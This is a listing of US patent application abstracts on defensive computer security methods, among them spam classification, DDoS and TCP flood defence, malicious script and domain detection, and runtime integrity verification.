20090307771DETECTING SPAM EMAIL USING MULTIPLE SPAM CLASSIFIERS - A method for detecting undesirable emails combines input from two or more spam classifiers to provide improved classification effectiveness and robustness. The method includes obtaining a score from each of a plurality of constituent spam classifiers by applying them to a given input email. The method further includes obtaining a combined spam score from a combined spam classifier that takes as input the plurality of constituent spam classifier scores, the combined spam classifier being computed automatically in accordance with a specified false-positive vs. false-negative tradeoff. The method further includes identifying the given input email as an undesirable email if the combined spam score indicates that the input e-mail is undesirable.12-10-2009
20090307770APPARATUS AND METHOD FOR PERFORMING INTEGRITY CHECKS ON SOFWARE - An apparatus and method are provided for performing integrity checking of software code executing on a processing unit of the apparatus. The apparatus further includes debug logic used when debugging program code executed by the processing unit, and trusted logic for performing trusted integrity checking operations on less-trusted program code executed by the processing unit. The debug logic has an interface via which the trusted logic can program one or more control registers, that interface not being accessible by the less-trusted program code. The trusted logic programs the control registers so as to cause the debug logic to be re-used to detect one or more activities of the processing logic during execution of the less-trusted program code, and the trusted integrity checking operations performed by the trusted logic are influenced by the activities detected by the debug logic. Such an approach has been found to provide an efficient and secure technique for performing run-time integrity checking of program code.12-10-2009
20090307769METHOD AND APPARATUS FOR PROVIDING NETWORK SECURITY - The invention relates to the provision of virus scanning capabilities in a network environment. Optimum use is made of a plurality of virus scanners by inspecting content passed over the network to identify which of the scanners is most suitable for that content. The content is then passed to the appropriate scanners in dependence on the results of the inspection.12-10-2009
20120297476Verifying Transactions Using Out-of-Band Devices - The present disclosure relates to verifying transactions using user devices. A client device used to complete a transaction with a server computer. The client device communicates with a user device such as a smart phone, laptop computer, or other computing device. The user device communicates with the client device and a verification server via the out-of-band communication channel. The verification server receives two or more copies of session data associated with the transaction occurring between the client device and the server computer. One copy of the session data is received from the server computer and another copy of the session data is provided by the user device. The two copies of the session data are compared by the verification server or by the user device, and mismatches are reported as suspected malicious software attacks.11-22-2012
20090100518SYSTEM AND METHOD FOR DETECTING SECURITY DEFECTS IN APPLICATIONS - A system and method for detecting vulnerabilities in a deployed web application includes developing a profile of acceptable behavior for inbound communication and outbound communication of a web application. The method also includes receiving a current inbound communication and a current outbound communication from the web application. The current inbound communication includes an inbound user request and the current outbound communication is in response to the current inbound communication. The current inbound communication and the current outbound communication are validated with the profile of acceptable behavior to identify an anomaly. The identified anomaly includes an occurrence of an acceptable behavior for the current inbound communication in combination with an occurrence of an unacceptable behavior for the current outbound communication.04-16-2009
20120192271Apparatus and Method for Enhancing Security of Data on a Host Computing Device and a Peripheral Device - A method is provided of enhancing security of at least one of a host computing device and a peripheral device. In the method, the host computing device is coupled to the peripheral device through a communication interface. The method includes transparently receiving data from one of the peripheral device and the host computing device, and storing the received data. The method further includes analyzing the stored data to identify a circumstance posing a security risk. If analyzing does not identify such a circumstance, then the method includes transparently echoing the data to the other of the peripheral device and the host. If analyzing does identify such a circumstance, then the method includes performing a security process defined by a rule. Related apparatus is provided, as well as other methods and apparatus.07-26-2012
20110016524BLIND VERIFICATION OF COMPUTER FIRMWARE - The means for using zero-knowledge protocols to provide assurance that the executable program instructions in a particular computing device are identical to given set of executable program instructions without revealing the executable program instructions themselves are disclosed.01-20-2011
20130167229TRAFFIC MANAGING DEVICE AND METHOD THEREOF - Disclosed is a traffic managing device which includes an information collector collecting primary information associated with a flow; a controller judging a traffic state, collecting secondary information associated with the traffic based on the judged traffic state and the primary information, and judging whether the flow is abnormal, based on the secondary information; and a traffic correspondence unit dropping the flow based on the judged traffic state and whether the flow is abnormal. The primary information includes internet protocol addresses of source and destination of the flow and the secondary information includes a flow number of each internet protocol address of a source.06-27-2013
20130074184PACKET PROCESSING IN A MULTIPLE PROCESSOR SYSTEM - Packet processing is provided in a multiple processor system including a first processor to processing a packet and to create a tag associated with the packet. The tag includes information about the processing of the packet. A second processor receives the packet subsequent to the first processor and processes the packet using the tag information.03-21-2013
20130074183METHOD AND APPARATUS FOR DEFENDING DISTRIBUTED DENIAL-OF-SERVICE (DDOS) ATTACK THROUGH ABNORMALLY TERMINATED SESSION - There are provided a method and apparatus for defending a Distributed Denial-of-Service (DDoS) attack through abnormally terminated sessions. The DDoS attack defending apparatus includes: a session tracing unit configured to parse collected packets, to extract header information from the collected packets, to trace one or more abnormally terminated sessions corresponding to one of pre-defined abnormally terminated session cases, based on the header information, and then to count the number of the abnormally terminated sessions; and an attack detector configured to compare the number of the abnormally terminated sessions to a predetermined threshold value, and to determine whether a DDoS attack has occurred, according to the results of the comparison. Therefore, it is possible to significantly reduce a false-positive rate of detection of a DDoS attack and the amount of computation for detection of a DDoS attack.03-21-2013
20130074182INFORMATION PROCESSING APPARATUS AND CONTROL METHOD OF THE SAME - A device function to be used by an application is specified, a risk level of the specified device function is acquired, and a risk level of the application is calculated based on the acquired risk level of the device function.03-21-2013
20130074181Auto Migration of Services Within a Virtual Data Center - Techniques are provided herein for detecting that virtual data center services provided to one of at least two customers are being subjected to an attack, wherein the virtual data center services are provided to the least two customers using a same first set of physical servers via a first network element such as a physical access switch, and responsive to detecting that virtual data center services provided to the one of the at least two customers are being subjected to an attack (e.g., a virus or denial of service attack), the technique causes the virtual data center services provided to the one of the at least two customers to be migrated to, e.g., instantiated on, a second set of physical servers that is not accessible via the first network element.03-21-2013
20100281537SECURE MULTI-PRINCIPAL WEB BROWSER - A web browser operating system using a browser kernel places principals having different origins in separate principal instances, where each separate principal instance executes in a separate protection domain. Principal origin may be determined using the combination of protocol, domain name, and port. The browser kernel mediates communications between principal instances, and between the principal instances and the operating system. Within each principal instance, a browser runtime executes as a restricted operating system process (ROSP), while any plugins are executed as a separate ROSP. Renderings from each browser runtime are combined by the browser kernel for presentation to a user.11-04-2010
20130061321Using Aggregated DNS Information Originating from Multiple Sources to Detect Anomalous DNS Name Resolutions - A DNS security system collects and uses aggregated DNS information originating from a plurality of client computers to detect anomalous DNS name resolutions. A server DNS security component receives multiple transmissions of DNS information from a plurality of client computers, each transmission of DNS information concerning a specific instance of a resolution of a specific DNS name. The server component aggregates the DNS information from the multiple client computers. The server component compares DNS information received from a specific client computer concerning a specific DNS name to aggregated DNS information received from multiple client computers concerning the same DNS name to identify anomalous DNS name resolutions. Where an anomaly concerning received DNS information is identified, a warning can be transmitted to the specific client computer from which the anomalous DNS information was received.03-07-2013
20090282480Apparatus and Method for Monitoring Program Invariants to Identify Security Anomalies - A computer readable storage medium includes executable instructions to insert monitors at selected locations within a computer program. Training output from the monitors is recorded during a training phase of the computer program. Program invariants are derived from the training output. During a deployment phase of the computer program, deployment output from the monitors is compared to the program invariants to identify security anomalies.11-12-2009
20080282346Data Type Management Unit - A data type management unit. The data type management unit is configured to include a rules module which includes at least one identification standard paired with an associated code type, an interface module configured to receive a code signal, and an analysis module coupled to the interface module and to the rules module. Each identification standard includes a comparison rule paired with an associated rejection criteria; the comparison rule of each identification standard includes at least one code pattern representative of the associated code type; and the rejection criteria of each identification standard includes at least one rejection rule. The analysis module is configured to compare the received code signal to each code pattern in each identification standard and to recognize if one or more of the comparison results violates one or more of the rejection rules.11-13-2008
20090055928METHOD AND APPARATUS FOR PROVIDING PHISHING AND PHARMING ALERTS - Provided is an Internet information security technique, and more particularly, a method for alerting a user that a connected web site is a phishing site by comparing connected web site information with normal site information.02-26-2009
20130185792DYNAMIC EXECUTION PREVENTION TO INHIBIT RETURN-ORIENTED PROGRAMMING - A method, apparatus, and/or system for execution prevention is provided. A state indicator for a first subset of a plurality of memory pages of executable code in a memory device is set to a non-executable state. A state indicator for a second subset of the plurality of memory pages is set to an executable state, where the second subset of the plurality of memory pages includes indirection stubs to functions in the first subset of the plurality of memory pages. Upon execution of an application, a function call is directed to a corresponding indirection stub in the second subset of the plurality of memory pages which modifies the state indicator for a corresponding function in the first subset of the plurality of memory pages prior to directing execution of the called function from the first subset of the plurality of memory pages.07-18-2013
20120117645DETECTION CIRCUIT, DETECTION METHOD THEREOF, AND MEMORY SYSTEM INCLUDING THE DETECTION CIRCUIT - A detection circuit, including a sensing circuit configured to sense whether there is an external attack and generate second data from first data, a data conversion circuit configured to convert the first data to third data, and a comparator configured to compare the second data with the third data.05-10-2012
20120117646TRANSMISSION CONTROL PROTOCOL FLOODING ATTACK PREVENTION METHOD AND APPARATUS - Disclosed herein is a Transmission Control Protocol (TCP) flooding attack prevention method. The TCP flooding attack prevention method includes identifying the type of a packet received at an intermediate stage between a client and a server; determining the direction of the packet; defining a plurality of session states based on the type and the direction of the packet; detecting a TCP flooding attack by tracking the session states for each flow; and responding to the TCP flooding attack based on the type of the TCP flooding attack.05-10-2012
20130067571METHOD AND SYSTEM FOR MANAGING SUSPICIOUS DEVICES ON NETWORK - A method and system for managing suspicious devices on a network. The method includes, setting based on a manager's input or selection a suspicious group corresponding to each of at least one suspicious management item for managing a plurality of devices on a network via a user interface; accessing the devices and reading information corresponding to the suspicious management item; determining whether each device is a suspicious device based on the information corresponding to the suspicious management item, and registering the device in the suspicious group if the device is determined as a suspicious device; checking whether an error of the device comprised in the suspicious group is resolved; and eliminating the device from the suspicious group if the error of the device is resolved.03-14-2013
20130067573SYSTEM AND METHOD FOR HUMAN IDENTIFICATION PROOF FOR USE IN VIRTUAL ENVIRONMENTS - System, method and computer program product for verifying an avatar owner as a human user of an avatar in a virtual world environment in which humans interact through avatars via client devices in network communication with a server device. A request for challenging an avatar in the virtual world environment is received to determine whether that avatar is controlled by an application program user (bot). A user client device associated with a challenged avatar is identified and a Human Identification Proof (HIP) message for detecting a human user versus a bot controlling the challenged avatar is generated and communicated, for receipt at the identified user client device. It is determined from the response, whether the user is a bot or a human user. If a challenged avatar is determined to be a bot, then the server device prevents the challenged avatar from further interaction in the virtual world environment.03-14-2013
20130067572SECURITY EVENT MONITORING DEVICE, METHOD, AND PROGRAM - The security event monitoring device includes: a storage module which stores in advance a correlation rule; a log collection unit which receives each log from each monitoring target device; a correlation analysis unit which generates scenario candidates by associating each of the logs; a scenario candidate evaluation unit which calculates the importance degrees of each scenario candidate; and a result display unit which displays/outputs the scenario candidate of a high importance degree. The scenario candidate evaluation unit includes: a user association degree evaluation function which calculates user association degrees; an operation association degree evaluation function which calculates the operation association degrees; and a scenario candidate importance reevaluation function which recalculates the importance degrees of each of the scenario candidates by each user according to the user association degrees and the operation association degrees.03-14-2013
20130067570Content Inspection - Content inspection techniques are described. In one or more implementations, it is detected that an application executing on a computing device is calling a particular code element of a group of code elements to be used to process content. For example, the group of code elements can include a pre-specified group of code elements (e.g., functions and/or properties) that may enable access to particular functionalities of a computing device and thus are associated with a known security risk. It is then ascertained that the content is untrusted and, in response to ascertaining that the content is untrusted, the content is inspected to determine if the content is safe to be passed to the code element.03-14-2013
20110023117Method and System for Restricting Access to User Resources - A user's set top box (STB), or other client, executes a shell and has an application program interface (API) by which certain features of the client can be controlled. The client is in communication with a walled garden proxy server (WGPS), which controls access to a walled garden. The walled garden contains links to one or more servers providing network-based services. The client sends a request to the WGPS to access a service provided by a site in the garden. To provide the service, the site sends the client a message containing code calling a function in the API. The WGPS traps the message from the site and looks up the site in a table to determine the access control list (ACL) for the site. The ACL is a bit-map that specifies which functions of the client's API can be invoked by code from the site. The WGPS includes the ACL in the header of the hypertext transport protocol (HTTP) message to the client. The shell receives the message and extracts the ACL. The shell uses the ACL to determine whether the code has permission to execute any called functions in the API. If the code lacks permission, the shell stops execution and sends a message to the site indicating that the site lacks permission. Otherwise, the shell allows the code to call the function.01-27-2011
20110023116METHOD AND APPARATUS FOR SPAM SHORT MESSAGE DETECTION - A method and apparatus for spam short message detection. The method includes obtaining sending characteristics of at least two suspected short message sources, judging whether the two suspected short message sources have similar sending characteristics, and determining the two suspected short message sources as spammer if they have similar sending characteristics. A spammer that makes multiple short message sources send short messages alternately can be detected through similar sending characteristics of the short message sources.01-27-2011
20110023115HOST INTRUSION PREVENTION SYSTEM USING SOFTWARE AND USER BEHAVIOR ANALYSIS - In embodiments of the present invention improved capabilities are described for threat detection using a behavioral-based host-intrusion prevention method and system for monitoring a user interaction with a computer, software application, operating system, graphic user interface, or some other component or client of a computer network, and performing an action to protect the computer network based at least in part on the user interaction and a computer code process executing during or in association with a computer usage session.01-27-2011
20110023114Method and System For Traffic Management Via Virtual Machine Migration - Aspects of a method and system for traffic management via virtual machine migration include detecting an abnormal traffic pattern in traffic communicated by a first virtual machine that utilizes a first set of network resources. Responsive to the detection of the abnormal pattern, a second virtual machine that utilizes a second set of network resources may be initialized. The second virtual machine may take over functions performed by the first virtual machine and initialization of the second virtual machine is based on an analysis of the traffic. The second virtual machine may be initialized utilizing stored virtual machine sate information in instances that the abnormal traffic is a result of a malicious attack. The second virtual machine may be initialized utilizing current virtual machine state information in instances that the abnormal traffic is not a result of a malicious attack.01-27-2011
20120198549METHOD AND SYSTEM FOR DETECTING MALICIOUS DOMAIN NAMES AT AN UPPER DNS HIERARCHY - A method and system for detecting a malicious domain name, comprising: collecting domain name statistical information from a non-recursive domain name system name server (RDNS NS); and utilizing the collected domain name statistical information to determine if a domain name is malicious or benign.08-02-2012
20120272315QUARANTINING PACKETS RECEIVED AT DEVICE IN NETWORK COMMUNICATIONS UTILIZING VIRTUAL NETWORK CONNECTION - A method of engaging in network communications by a device includes spawning a first virtual machine for a network connection that virtualizes network capabilities of a device; receiving a packet communicated from a transmitting device at the first virtual machine of the device; determining that the packet is corrupted, said determination being based on information from an application running on the device; in response to said step of determining that the packet is corrupted, quarantining the packet; spawning a second virtual machine for a network connection that virtualizes network capabilities of the device; and communicating, using the second virtual machine, a message to the transmitting device.10-25-2012
20120272314DATA COLLECTION SYSTEM - A data collection system for generating alerts is disclosed. In some embodiments, information is gathered from a plurality of internet facilities that are used for malicious purposes. In response to detecting in the gathered information data that satisfies an alert condition associated with malicious activity, an alert to warn a potential target of the malicious activity is generated.10-25-2012
20090013406DYNAMIC TRUST MANAGEMENT - A method and apparatus are provided for tracking the state of a software component in use on a computing platform. Upon a change of a first type in the software component (such as a change to an integrity-critical part of the component), an appropriate integrity metric of the software component is reliably measured and recorded in cumulative combination with any previous integrity metric values recorded for changes of the first type to the software component. Upon a change of a second type in the software component (such as a change to a non integrity-critical part of the component), an appropriate integrity metric of the software component is reliably measured and recorded as a replacement for any previous integrity metric value recorded for changes of the second type to the software component. The two resultant values provide an indication of the integrity state of the software component.01-08-2009
20090013405Heuristic detection of malicious code - Scanning of computer files for malware uses a classifying technique to classify an input file as a clean file or a dirty file. The parameters of the classifying technique are derived to train the classification on a corpus of reference files including clean files known to be free of malware and dirty files known to contain malware. The classification is performed using a representation of the files in a feature space defined by a set of predetermined features for respective file formats, the features being a predetermined value or range of values for one or more data fields of given meanings. The representation of a file is derived by determining the file format, parsing the file on the basis of the structure of data fields in the determined file format to identify the data fields and their meaning, and determining, on the basis of the identified data fields, which of the set of predetermined features are present.01-08-2009
20090007265Defending Against Denial Of Service Attacks - In various embodiments, a server may be provided. The server may respond to a request for a service, from a processing device, with a challenge. The challenge may include a partial key for a memory-intensive operation, a number of iterations of the memory-intensive operation to perform, and a result of performing the number of iterations of the memory-intensive operation. Upon receiving the challenge, the processing device may choose a complete key consistent with the partial key and may produce a proposed result by performing the memory-intensive operation for the number of iterations. When the proposed result matches the result included in the challenge, the processing device may send a challenge answer, including the chosen complete key, to the server. Upon receiving a correct challenge answer from the processing device, the server may access the requested service and may return a result of the access to the processing device.01-01-2009
20090007264SECURITY SYSTEM WITH COMPLIANCE CHECKING AND REMEDIATION - A security system is provided for use with computer systems. In various embodiments, the security system can analyze the state of security of one or more computer systems to determine whether the computer systems comply with expressed security policies and to remediate the computer systems so that they conform with the expressed security policies. In various embodiments, the security system can receive compliance documents, determine whether one or more computer systems comply with portions of security policies specified in the compliance documents, and take actions specified in the compliance documents to cause the computer systems to comply with the specified security policies. The security system may provide a common, unified programming interface that applications or tools can employ to verify or enforce security policies.01-01-2009
20090007263Method and Apparatus for Combining Traffic Analysis and Monitoring Center in Lawful Interception - A method and apparatus for integrating intercepted information with information obtained from an at least one data retention source, the method comprising receiving intercepted information from an interception source, receiving information from a data retention source, and analyzing the information received from the data retention source, in association with the intercepted information. The intercepted information can comprise meta data related to the intercepted communications, and/or the contents of the communication themselves. This enables a user such as a law enforcement agency to reveal possibly indirect connections between target entities s wherein the connections involve non-target entities. The method and apparatus combine interception and content analysis methodologies with traffic analysis techniques.01-01-2009
20120240228MULTI-DIMENSIONAL REPUTATION SCORING - Methods and systems for assigning reputation to communications entities include collecting communications data from distributed agents, aggregating the communications data, analyzing the communications data and identifying relationships between communications entities based upon the communications data.09-20-2012
20080295169DETECTING AND DEFENDING AGAINST MAN-IN-THE-MIDDLE ATTACKS11-27-2008
20130167230DEVICE REPUTATION MANAGEMENT - A device reputation server recognizes malicious devices used in prior attacks and prevents further attacks by the malicious devices. Server computers require a digital fingerprint of any client devices prior to providing any service to such client devices. Logging of network activity include the digital fingerprint of the device perpetrating the attack. When an attack is detected or discovered, the attacked server reports the attack and the digital fingerprint of the perpetrating device to a device reputation server. The device reputation server uses the report to improve future assessments of the reputation of the device associated with the reported digital fingerprint.06-27-2013
20110239294SYSTEM AND METHOD FOR DETECTING MALICIOUS SCRIPT - Provided are a system and method for detecting a malicious script. The system includes a script decomposition module for decomposing a web page into scripts, a static analysis module for statically analyzing the decomposed scripts in the form of a document file, a dynamic analysis module for dynamically executing and analyzing the decomposed scripts, and a comparison module for comparing an analysis result of the static analysis module and an analysis result of the dynamic analysis module to determine whether the decomposed scripts are malicious scripts. The system and method can recognize a hidden dangerous hypertext markup language (HTML) tag irrespective of an obfuscation technique for hiding a malicious script in a web page and thus can cope with an unknown obfuscation technique.09-29-2011
20100218252NETWORK PROTECTION VIA EMBEDDED CONTROLS - The present disclosure provides a method for providing network protection. A method according to one embodiment may include detecting an infected data packet at an in-line device. The method may further include receiving a first instruction from the in-line device at a central management server, the instruction identifying the origin of the infected data packet. The method may also include receiving a marking instruction from the central management server at an infected endpoint device and marking outgoing data packets at the infected endpoint device to create marked data packets. Of course, many alternatives, variations and modifications are possible without departing from this embodiment.08-26-2010
20110126285INTERNET SITE SECURITY SYSTEM AND METHOD THERETO - The present invention discloses an internet site security system and method thereof. That is, the present invention comprises a browser execution module which executes the browser for providing a work-performing environment on the internet site according to the selection of a user; a memory protection module which, according to the execution of the browser, prevents an external module from accessing a memory area allocated to the browser and detects whether the memory area is tampered or not and whether the executing code is tampered or not; and a browser protection module which prevents another process or module from debugging the browser execution module according to the execution of the browser, and distinguishing several modules loaded to the memory area into acceptable modules and unacceptable modules, and thereby is able to provide a secure electronic transaction based environment against a malicious attack.05-26-2011
20110283355EDGE COMPUTING PLATFORM FOR DELIVERY OF RICH INTERNET APPLICATIONS - An edge computing platform that provides on-demand delivery of Rich Internet Applications and other applications is disclosed. One embodiment includes an optional manager node and content distribution network (CDN) that include one or more compute nodes. The CDN collects information pertaining to execution of a software application. The CDN aggregates the information and transfers the aggregated information to the manager node. The manager node analyzes the information from the CDN and transfers results of the analysis to the CDN. The CDN receives a software application that is designed to be dynamically updated when executed at the clients. The CDN modifies the software application based on the information from the manager node. The CDN receives a request that pertains to the software application from a client device. The CDN transfers at least a portion of the modified software application to the client.11-17-2011
20110283356Security Monitoring - Disclosed are systems, apparatus, methods, and computer readable media for determining a combined trust level for a website. In one embodiment, a user account associated with the creation or maintenance of the website may be analyzed. The analysis of the user account may be capable of identifying the presence or absence of a first risk factor affecting a likelihood that the user account is engaged in a malicious activity. A source code file capable of being used to create a message for sending to a remote computing device may be analyzed. The analysis of the source code file may be capable of identifying the presence or absence of a second risk factor affecting a likelihood that the source code file is facilitating a malicious activity. Based on the analysis, a combined trust level for the website may be determined.11-17-2011
20110283357SYSTEMS AND METHODS FOR IDENTIFYING MALICIOUS DOMAINS USING INTERNET-WIDE DNS LOOKUP PATTERNS - Systems and methods are disclosed for identifying domains as malicious based on Internet-wide DNS lookup patterns. Disclosed embodiments look for variance in the servers that look up a domain and also look at the popularity growth (quantity of queries from unique addresses) of a domain after registration to identify malicious domains. Other disclosed embodiments measure the similarity of servers that query a domain and cluster domains based on the similarity of those servers. Disclosed embodiments may use such temporal and spatial lookup patterns as input to a blacklist process to more effectively and quickly blacklist domains based on their Internet-wide lookup patterns.11-17-2011
20080271144METHOD FOR THE AUTHENTICATED TRANSMISSION OF A PERSONALIZED DATA SET OR PROGRAM TO A HARDWARE SECURITY MODULE IN PARTICULAR OF A FRANKING MACHINE - In a method and arrangement for authenticated transmission of a personalized data set or program to a hardware security module in a device such as a franking machine, a system manufacturer buys security modules, from a security module manufacturer and incorporate the security modules at a production site in the device and loads a data set and/or an application program into the security module, making the device operable. Authentication occurs using a first security module-specific fixed code, a second security module-specific fixed code that is calculated from the first code according to a given algorithm, and a third security module-specific fixed code that is calculated from the second code and the data in the data set and/or in the program.10-30-2008
20090150997APPARATUS AND METHOD FOR DETECTING MALICIOUS FILE IN MOBILE TERMINAL - Provided is an apparatus and method for detecting a malicious file that attempts to initiate communication in a mobile terminal without a user's approval. The method of detecting a malicious file in a mobile terminal includes: determining whether a file to be examined is an executable file; when the file is an executable file, examining whether the file is a malicious file that can cause unapproved communication based on at least one predetermined examination condition; and outputting the result of examining whether the file is the malicious file. Accordingly, an attack caused by a new type of malicious code can be coped with.06-11-2009
20090150998REMOTE COLLECTION OF COMPUTER FORENSIC EVIDENCE - The invention is directed to techniques for allowing a user to remotely interrogate a target computing device in order to collect and analyze computer evidence that may be stored on the target computing device. A forensic device receives input from a remote user that identifies computer evidence to acquire from the target computing device. The forensic device acquires the computer evidence from the target computing device and presents a user interface for the forensic device through which the remote user views the computer evidence acquired from the target computing device. In this manner, forensic device allows the user to interrogate the target computing device to acquire the computer evidence without seizing or otherwise “shutting down” the target device.06-11-2009
20080216174Sensitive Data Scanner - A method and system of scanning a client for sensitive data. A server may receive, from the client, a request to scan the data stored in the data storage of the client for sensitive data. In response to receiving the request, the server may provide the client with a scanner, which causes the client to carry out functions including: (a) scanning the data stored in data storage to identify sensitive data; (b) collecting data based on the identified sensitive data; and (c) reporting the collected data. The server may then receive the collected data from the client and responsively analyze the data. The server may also provide feedback about the identified sensitive data to the client or another server.09-04-2008
20110302652SYSTEM AND METHOD FOR DETECTING REAL-TIME SECURITY THREATS IN A NETWORK DATACENTER - The system and method described herein may include a configuration management database that describes every known service endpoint in a network datacenter to represent a steady state for the datacenter. One or more listeners may then observe traffic in the datacenter in real-time to detect network conversations initiating new activity in the datacenter, which may be correlated, in real-time, with the information in the configuration management database representing the steady state for the datacenter. Thus, in response to the new activity failing to correlate with the known service endpoints, a real-time security alert may be generated to indicate that any network conversations initiating such activity fall out-of-scope from the steady state for the information technology datacenter.12-08-2011
20110289583CORRELATION ENGINE FOR DETECTING NETWORK ATTACKS AND DETECTION METHOD - A method for detecting network attacks is provided. In one implementation, the method receives a plurality of attack indications based on data transmitted on the network and applies rules to the plurality of attack indications. Also, the method generates an alert if an application of at least a subset of the rules on the plurality of attack indications indicates a potential attack. In addition, a network device that performs the method and a computer program corresponding to the method are provided.11-24-2011
20110296524Campaign Detection - Campaign detection techniques are described. In implementations, a signature is computed for each of a plurality of emails to be communicated by a service provider to respective intended recipients. A determination is made that two or more of the plurality of emails is similar based on the respective signatures. Responsive to a finding that a number of similar emails exceeds a threshold, an indication is output that the similar emails have a likelihood of being involved in a spam campaign.12-01-2011
20110302651VERIFICATION OF A SEGMENTED PROGRAM ON A PARALLEL PROCESSING COMPUTING SYSTEM - Embodiments of the invention provide a method, apparatus, and program product to verify a program that includes a plurality of sections with a computing system that is configured to process a plurality of threads of execution. The method comprises verifying and executing a first section of the program utilizing a first thread of execution in response to activation of the program and determining a second section of the program to execute subsequent to the first section. The method further comprises verifying the second section utilizing a second thread of execution in parallel with the execution of the first section. Another embodiment of the invention provides a method of compiling program that includes program code by grouping the program code into sections based upon the execution time of the program code and based upon which program code is most commonly executed.12-08-2011
20110302653System and Method for Network Security Including Detection of Attacks Through Partner Websites - A computer readable storage medium has instructions for execution on a computer. The instructions monitor transactions between a server and a set of clients. An evaluation of session indicators associated with the transactions is performed. Individual sessions between the server and individual clients of the plurality of clients are isolated in response to the evaluation.12-08-2011
20130219494METHOD OF ANALYZING THE BEHAVIOR OF A SECURE ELECTRONIC TOKEN - The invention is a method of analyzing the behavior of a secure electronic token which comprises an interface for exchanging data with an external entity. The token has a lifecycle wherein the token is intended to be created then issued. The method comprises the steps of: 08-22-2013
20130219495SYSTEM AND METHOD FOR OPTIMIZATION OF SECURITY TASKS BY CONFIGURING SECURITY MODULES - A system and method for dynamic configuration of the security modules for optimization of execution of security tasks are provided. The system includes: a mechanism for identifying the clients connected to the network; a client data collection unit that determines hardware/software configurations of each detected client; a security module selection and installation unit that selects required modules for each client; a statistics collection unit that collects the security tasks execution statistics from user modules and from client modules; and a configuration unit that configures the client and server modules based on the collected statistics in order to optimize execution of the security tasks.08-22-2013
20120090029METHOD FOR PROTECTING COMPUTER PROGRAMS AND DATA FROM HOSTILE CODE - A method that protects computer data from untrusted programs. Each computer's object and process is assigned with trust attributes, which define the way it can interact with other objects within the system. When an object is classified as untrusted, it can interact with other object within the system on a limited basis. A virtualized system is provided on the computer so that when the untrusted object attempts to perform an operation that is outside its scope of authorization, the virtualized system intercepts the operation but present the untrusted program with an indication that the requested operation has been performed. The method further includes processes to securely move a program from an untrusted group to a trusted group.04-12-2012
20120090028REAL-TIME NETWORK ATTACK DETECTION AND MITIGATION INFRASTRUCTURE - The invention features systems and methods for detecting and mitigating network attacks in a Voice-Over-IP (VoIP) network. A server is configured to receive information related to a mitigation action for a call. The information can include a complexity level for administering an audio challenge-response test to the call and an identification of the call. The server also generates i) a routing label based on the identification of the call, and ii) a script defining a plurality of variables that store identifications of a plurality of altered sound files for the audio challenge-response test. Each altered sound file is randomly selected by the server subject to one or more constraints associated with the complexity level. The server is further configured to transmit the script to a guardian module and the routing label to a gateway.04-12-2012
20100269177SWITCHING NETWORK EMPLOYING A USER CHALLENGE MECHANISM TO COUNTER DENIAL OF SERVICE ATTACKS - A communication infrastructure includes an intermediate routing node that routes a plurality of packets between a source device and a plurality of destination devices, a plurality of templates stored on the intermediate routing node and a service function. The intermediate routing node, e.g., a switch, router, access point, bridge, or gateway, identifies packets containing requests for a webpage, the requests being a service attack attempt by comparing the packet with the plurality of templates. Then, the intermediate routing node denies service attack by interacting with the server and client devices. That is, the intermediate routing node sends messages with challenge mechanism to the server, based on the response or otherwise, sends messages and anti-service attack downloads to the client devices and receives response.10-21-2010
20100058472METHOD FOR PROTECTING COMPUTER PROGRAMS AND DATA FROM HOSTILE CODE - A method that protects computer data from untrusted programs. Each computer's object and process is assigned with trust attributes, which define the way it can interact with other objects within the system. When an object is classified as untrusted, it can interact with other object within the system on a limited basis. A virtualized system is provided on the computer so that when the untrusted object attempts to perform an operation that is outside its scope of authorization, the virtualized system intercepts the operation but present the untrusted program with an indication that the requested operation has been performed. The method further includes processes to securely move a program from an untrusted group to a trusted group.03-04-2010
20100169970SYSTEM AND METHODS FOR DETECTING MALICIOUS EMAIL TRANSMISSION - A system and methods of detecting an occurrence of a violation of an email security policy of a computer system. A model relating to the transmission of prior emails through the computer system is defined which is derived from statistics relating to the prior emails. For selected emails to be analyzed, statistics concerning the selected email are gathered. Such statistics may refer to the behavior or other features of the selected emails, attachments to emails, or email accounts. The determination of whether a violation of an email security policy has occurred is performed by applying the model of prior email transmission to the statistics relating to the selected email. The model may be statistical or probabilistic. A model of prior email transmission may include grouping email recipients into cliques. A determination of a violation of a security policy may occur if email recipients for a particular email are in more than one clique.07-01-2010
20100169969FUNCTIONAL PATCHING/HOOKING DETECTION AND PREVENTION - A method for preventing malicious attacks on software, using the patching method, includes providing a database of legitimate and known patches, the database contains characteristic code paths of said legitimate patches. The method also includes detecting whether a patch is malicious by inspecting one or more characteristic paths of the patch and matching one or more code paths against the database of legitimate and known patches. An activity needed to prevent the malicious patch from performing undesired activities is then performed.07-01-2010
20100169968PROCESSOR EXTENSIONS FOR EXECUTION OF SECURE EMBEDDED CONTAINERS - Methods and apparatus relating to processor extensions for execution of secure embedded containers are described. In an embodiment, a scalable solution for manageability function is provided, e.g., for UMPC environments or otherwise where utilizing a dedicated processor or microcontroller for manageability is inappropriate or impractical. For example, in an embodiment, an OS (Operating System) or VMM (Virtual Machine Manager) Independent (generally referred to herein as “OI”) architecture involves creating one or more containers on a processor by dynamically partitioning resources (such as processor cycles, memory, devices) between the HOST OS/VMM and the OI container. Other embodiments are also described and claimed.07-01-2010
20100169967Apparatus and method for runtime integrity verification - In some embodiments, a processor-based system may include at least one processor, at least one memory coupled to the at least one processor, a code block, and code which is executable by the processor-based system to cause the processor-based system to generate integrity information for the code block upon a restart of the processor-based system, securely store the integrity information, and validate the integrity of the code block during a runtime of the processor-based system using the securely stored integrity information. Other embodiments are disclosed and claimed.07-01-2010
20130219491SYSTEM AND METHOD FOR INTEGRITY RECONSTITUTION - A method of communicating data in a network comprises receiving a copy of a message on a first channel via at least one of a first port and a second port, the first port coupled to a first neighbor node and the second port coupled to a first neighbor's neighbor node; and selecting either the copy of the message received via the first port or the copy of the message received via the second port if a copy of the message is received via both the first port and the second port. If a copy of the message is only received via one of the first port or the second port, the received copy of the message is selected. The selected copy of the message is forwarded on the first channel to a second neighbor node via a third port and to a second neighbor's neighbor node via a fourth port; and the integrity of the selected copy of the message is determined based on supplemental integrity data received from another node, wherein the supplemental integrity data is exclusive of a copy of the message communicated on a second channel.08-22-2013
